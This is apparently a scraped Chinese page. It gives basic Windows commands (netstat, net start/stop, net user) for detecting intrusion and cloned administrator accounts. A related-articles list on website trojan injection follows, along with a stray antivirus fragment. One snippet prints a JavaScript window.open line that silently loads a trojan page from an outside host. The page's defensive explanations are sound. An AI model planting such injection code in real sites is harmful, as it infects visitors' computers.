一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。
一、检测网络连接
如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用 Windows自带的网络命令来看看谁在连接你的计算机。
具体的命令格式是:netstat -an这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息,我们就可以完全监控计算机上的连接,从而达到控制计算机的目的。
二、禁用不明服务
很多朋友在某天系统重新启动后会发现计算机速度变慢了,不管怎么优化都慢,用杀毒软件也查不出问题,这个时候很可能是别人通过入侵你的计算机后给你开放了特别的某种服务,比如IIS信息服务等,这样你的杀毒软件是查不出来的。但是别急,可以通过 “net start”来查看系统中究竟有什么服务在开启,如果发现了不是自己开放的服务,我们就可以有针对性地禁用这个服务了。
方法就是直接输入“net start”来查看服务,再用“net stop server”来禁止服务。 ( www.3lian.com )
三、轻松检查账户
很长一段时间,恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户,但这个账户是不经常用的,然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。恶意的攻击者可以通过这个账户任意地控制你的计算机。
为了避免这种情况,可以用很简单的方法对账户进行检测。
首先在命令行下输入net user,查看计算机上有些什么用户,然后再使用“net user+用户名”查看这个用户是属于什么权限的,一般除了Administrator是administrators组的,其他都不是!如果你发现一个系统内置的用户是属于administrators组的,那几乎肯定你被入侵了,而且别人在你的计算机上克隆了账户。快使用“net user用户名/del”来删掉这个用户吧!
联网状态下的客户端。对于没有联网的客户端,当其联网之后也会在第一时间内收到更新信息将病毒特征库更新到最新版本。不仅省去了用户去手动更新的烦琐过程,也使用户的计算机时刻处于最佳的保护环境之下。
检查电脑是否被挂马的常用命令
时间: 2024-09-19 09:18:46
检查电脑是否被挂马的常用命令的相关文章
分享站长快速检测网站是否被挂马的三方法
中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 网站被挂马或者被挂暗链说明网站的管理权限已落入他人之手,而且网站被挂马往往来给网站带来不可估量的负面影响,最常见的就是网站用户体验变形.网站被降权甚至是被K,而对于网站被马之后,很多站长都不能及时的发现并处理,导致网站出现状况后才有所感概.那么站长应该如何去防范这个网站最大的杀手呢?站长如何去检查自己的网站是否被挂马了呢?今天笔者以亲身经历来
怎样发现自已站点被挂马
中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 现在有很多的网民正慢慢步入站长的行列,加之现在的网上的自助建站系统及CMS系统有很多,只要想建站稍微懂得一些HTML语言就开始了自已的建站生涯,可是这样的小站长对现在的9201.html">互联网世界还是不太了解,一心想在网上捞到自已人生中的第一桶金,可却不是那么的容易,现在的互联网不像过去的2003年,成就了多少网络英雄?
百余家高校中招 电脑管家发布高校挂马大规模爆发预警
随着高考录取工作逐步展开,近来,不少 刚刚填报完志愿的同学莫名遭遇私人信息"被窃取并公开贩售",而"罪魁祸首"正是同学们用来了解高校信息的"学校官网".据了解,黑客借高考后高校网站访问高峰掀起挂马潮,目前全国已有百余家高校官网中招.电脑管家恶意URL处理中心数据显示,此类高校挂马网站的日拦截量高达十万余次,提醒广大学子提高警惕.498)this.w idth=498;' onmousewheel = 'javascript:return big(
该怎么预防和解决网站被挂马的问题
提示:我这里讨论是博客最近被ARP攻击的例子,烦死了.表现形式为网站被iframe挂马,弹出大量色情网站,问题出现了11个小时,这11小时都在血泪的探索中解决. 题记:如果你是从搜索引擎搜到这里的,我相信你一定非常着急,废话不多说,直入主题.其余感悟我挪到文章最后说. 我这里讨论是博客最近被ARP攻击的例子,烦死了.表现形式为网站被iframe挂马,弹出大量色情网站,问题出现了11个小时,这11小时都在血泪的探索中解决. 判断ARP攻击方法 一台服务器几乎所有网站打开网页HTML都被自动加上如这
sql数据库被挂马或插入JS木马的解决方案
很多网站可能遭遇到sql数据库被挂马者插入JS木马的经历:mssql的每个varchar.text字段都被自动插入一段js代码,即使删除这段代码,如果没有从源头上解决,几分钟后,js代码就又会自动插入数据库. 这很有可能是程序自动执行的,黑客先从搜索引擎google.百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马:然后,黑客就把这个网站纳入他的肉鸡列
CSS挂马及相应防范方法
用来制作网页特效的CSS代码,也可以用来挂马. 随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机.他们发现,用来制作网页特效的CSS代码,也可以用来挂马.而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来. 网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog.Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱.有许多非常著名的网站都被黑客用CSS挂马入侵过. 建议大家在点击陌生链接时
常见JS挂马方法及如何防止网站被黑客挂马?
一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro ll
挂马成网络交易安全最大克星 黑客“与时俱进”
中介交易 SEO诊断 淘宝客 云主机 技术大厅 "挂马"是指黑客把恶意代码嵌入到网页中,如果访问该网页的网友电脑存在安全漏洞,就会自动下载运行黑客指定的木马程序. 如今,黑客猖狂,不仅到处挂马,而且还借助各种热门信息散播病毒.据360安全卫士恶意网页监控数据显示,近日"暴雪"."大雪"."天气"等热门关键词被黑客所建垃圾站用来做搜索引擎优化的几率大大增加,在黑客论坛交流的数据中,一个日流量1万的网站至少可以制造上千台"
织梦DedeCMS系统挂马全面解决方法
织梦内容管理系统(DedeCMS),是一个集内容发布.编辑.管理检索等于一体的网站管理系统(Web CMS),他拥有国外CMS众多特点之外,还结合中国用户的需要,对内容管理系统概念进行明确分析和定位. 作为国内第一个开源的内容管理系统,DedeCMS在创建以来都在摸索中国互联网内容管理系统的道路,并且引领众多开源CMS前进的道路,程序由当年个人作品,现已组件团队,在提升用户服务.提高产品质量的同事,对中国网站内容管理系统进行研究,成为目前市场上最受欢迎的内容管理系统. dedecms用户是不是都